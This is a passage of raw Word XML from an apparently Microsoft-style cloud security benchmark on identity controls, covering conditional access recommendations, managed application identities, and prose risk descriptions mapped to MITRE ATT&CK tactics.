      </w:r>
    </w:p>
    <w:p w14:paraId="5F4CD194" w14:textId="3412B7D6" w:rsidR="001F7CBB" w:rsidRPr="00E53977" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>using broadly scoped credentials to mimic legitimate cloud API traffic (T1036), evading detection due to lack of role-specific audit trails or monitoring, bypassing coarse access logging mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E88C008" w14:textId="0678A3C5" w:rsidR="00666F55" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E026EA" w14:textId="51FE1C4B" w:rsidR="001F7CBB" w:rsidRDefault="001F7CBB" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:t>harvesting sensitive data or credentials from cloud resources with overly permissive access extracting API keys or user data from storage or instances due to absent role-based access boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495F4A6C" w14:textId="77777777" w:rsidR="00EC686A" w:rsidRDefault="00EC686A" w:rsidP="00EC686A"/>
    <w:p w14:paraId="0231CF52" w14:textId="77777777" w:rsidR="00EC686A" w:rsidRDefault="00EC686A" w:rsidP="00EC686A"/>
    <w:p w14:paraId="16E9E66D" w14:textId="77777777" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00EC686A"/>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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement conditional access controls using the following approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38681450" w14:textId="0F9B20E8" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy Microsoft Entra Conditional Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED76F1" w14:textId="77777777" w:rsidR="00EC686A" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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5F5CAB6B" w14:textId="66C7B191" w:rsidR="00EC686A" w:rsidRDefault="00EC686A" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>Define applicable conditions and criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F938E23" w14:textId="23447919" w:rsidR="00EC686A" w:rsidRDefault="00EC686A" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>Consider the following common use cases when defining applicable conditions and criteria for Microsoft Entra Conditional Access in your workload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B91A6C3" w14:textId="412D4857" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Require MFA for administrative roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF93AA" w14:textId="02299BC7" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Require multi-factor authentication for users with administrative roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A44F7F" w14:textId="2295A7A3" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Require MFA for management tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D904757" w14:textId="2126B59A" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Require multi-factor authentication for Azure management tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6056AEAC" w14:textId="07F322A9" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Block legacy authentication protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FBD003" w14:textId="41C5D431" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Block sign-ins for users attempting to use legacy authentication protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C95891A" w14:textId="44607C00" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce trusted locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FCB611" w14:textId="02ACD5F3" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Require trusted locations for multifactor authentication registration and block or grant access from specific locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF193CA" w14:textId="057A8A93" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Block risky sign-in behaviors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5891E025" w14:textId="599F8DEF" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Block risky sign-in behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1FC2D0" w14:textId="05EECE03" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Require managed devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CBF6C7" w14:textId="19E85722" w:rsidR="002D1D0F" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Require organization-managed devices for specific applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78422C6B" w14:textId="361A92BC" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement session management controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15618D74" w14:textId="333756ED" w:rsidR="00C70314" w:rsidRPr="00E53977" w:rsidRDefault="00C70314" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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2" w:name="_Toc242449485"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Protect applications and secrets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="16904896" w14:textId="7645F903" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="006078E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc242449486"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IM-3: Manage application identities securely and automatically</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="3A14B675" w14:textId="5C85B90D" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB18F4" w14:textId="7A69B262" w:rsidR="006078E0" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use managed application identities instead of creating human accounts for applications to access resources and execute code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B5B314" w14:textId="47E672B1" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>Managed application identities provide benefits such as reducing the exposure of credentials. Automate the rotation of credentials to ensure the security of the identities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FBA4F9" w14:textId="4C5CA348" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C1999BE" w14:textId="42234903" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Exposure of Hard-Coded Credentials in Code or Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D0B3A" w14:textId="27B39EA4" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Static credentials (e.g., API keys, client secrets) embedded in source code, build artifacts, or configuration files (e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>, .env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>, YAML) are exposed via misconfigured SCM repositories (e.g., public Git repos) or CI/CD pipelines, enabling adversaries to authenticate to cloud APIs via HTTP POST requests to token endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D295D38" w14:textId="583F805A" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Theft via Phishing or Interception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BF17D5" w14:textId="7537CDA7" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Adversaries capture long-lived credentials or API keys through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Unauthorized Access from Weak or Reused Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C5BB4" w14:textId="06FE0D23" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insecurely configured credentials (e.g., low-entropy passwords, reused API keys) are vulnerable to brute-force enumeration (e.g., password spraying via REST API calls) or credential stuffing attacks leveraging breached datasets, granting access to cloud management APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C77D4B" w14:textId="388E998F" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistent Access via Rogue or Orphaned Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095EF73E" w14:textId="023107D4" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Adversaries create unauthorized accounts or exploit unrevoked credentials from decommissioned resources, embedding static keys in cloud orchestration templates (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> files) to maintain persistent access through repeated OAuth 2.0 token exchanges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D06A558" w14:textId="140A44DD" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation from Over-Privileged Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC8BAB1" w14:textId="705E2F73" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Harvesting from Compromised Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E4BA94" w14:textId="21319BC7" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Adversaries extract plaintext credentials, API keys, or OAuth tokens from compromised cloud instances (e.g., via memory scraping) or unsecured storage (e.g., S3 buckets, config stores), using harvested data to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>authenticate to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> additional cloud APIs for lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD30330" w14:textId="502C559C" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Detection Evasion via Unmonitored Credential Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467537C4" w14:textId="4AB8B4C0" w:rsidR="006078E0" w:rsidRPr="00E53977" w:rsidRDefault="006078E0" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E01DEB" w14:textId="10E0D91B" w:rsidR="006078E0" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385748E9" w14:textId="44B3CBE3" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>exploiting hard-coded credentials or compromised user accounts embedded in cloud application code or configuration files, leveraging phishing (T1566.001) to steal passwords or exploiting misconfigured public-facing APIs (T1190) to authenticate via OAuth 2.0 or API key-based endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B1FAB" w14:textId="2807DCE8" w:rsidR="006078E0" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32302BF0" w14:textId="146C825D" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>targeting exposed credentials in source code repositories or unsecured storage (T1003), using brute-force attacks on weak user passwords (T1110.001) or intercepting API keys and session tokens (T1539) during cloud service authentication flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17651245" w14:textId="078381BF" w:rsidR="006078E0" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB0349A" w14:textId="6A778578" w:rsidR="00EC686A" w:rsidRDefault="00EC686A" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:lastRenderedPageBreak/>
        <w:t>maintaining access by creating rogue user accounts (T1136.003) or modifying cloud application configurations to embed persistent credentials (T1098.001), ensuring repeated authentication to cloud resources without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D161A" w14:textId="53323316" w:rsidR="006078E0" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B36944" w14:textId="5EE81589" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>Compromised user accounts or exposed API keys with excessive permissions are exploited to gain administrative access, abusing misconfigured role-based access controls (T1548.004) to manipulate cloud resources or management APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B2B9D9" w14:textId="7C422780" w:rsidR="006078E0" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453663C" w14:textId="0726A0C6" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00EB0CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>Attackers evade detection by forging stolen API keys or session tokens (T1606.002) to mimic legitimate cloud traffic or disabling audit logging (T1562.001), masquerading as authorized users (T1036) to avoid monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13774A26" w14:textId="5065E1FB" w:rsidR="006078E0" w:rsidRDefault="006078E0" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCEDF5D" w14:textId="77E68A2C" w:rsidR="00EC686A" w:rsidRPr="00E53977" w:rsidRDefault="00EC686A" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC686A">
        <w:t>harvesting hard-coded credentials, API keys, or user session data from compromised cloud instances or storage (T1213.002), targeting configuration files or memory dumps (T1005) to gather sensitive data for lateral movement.</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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
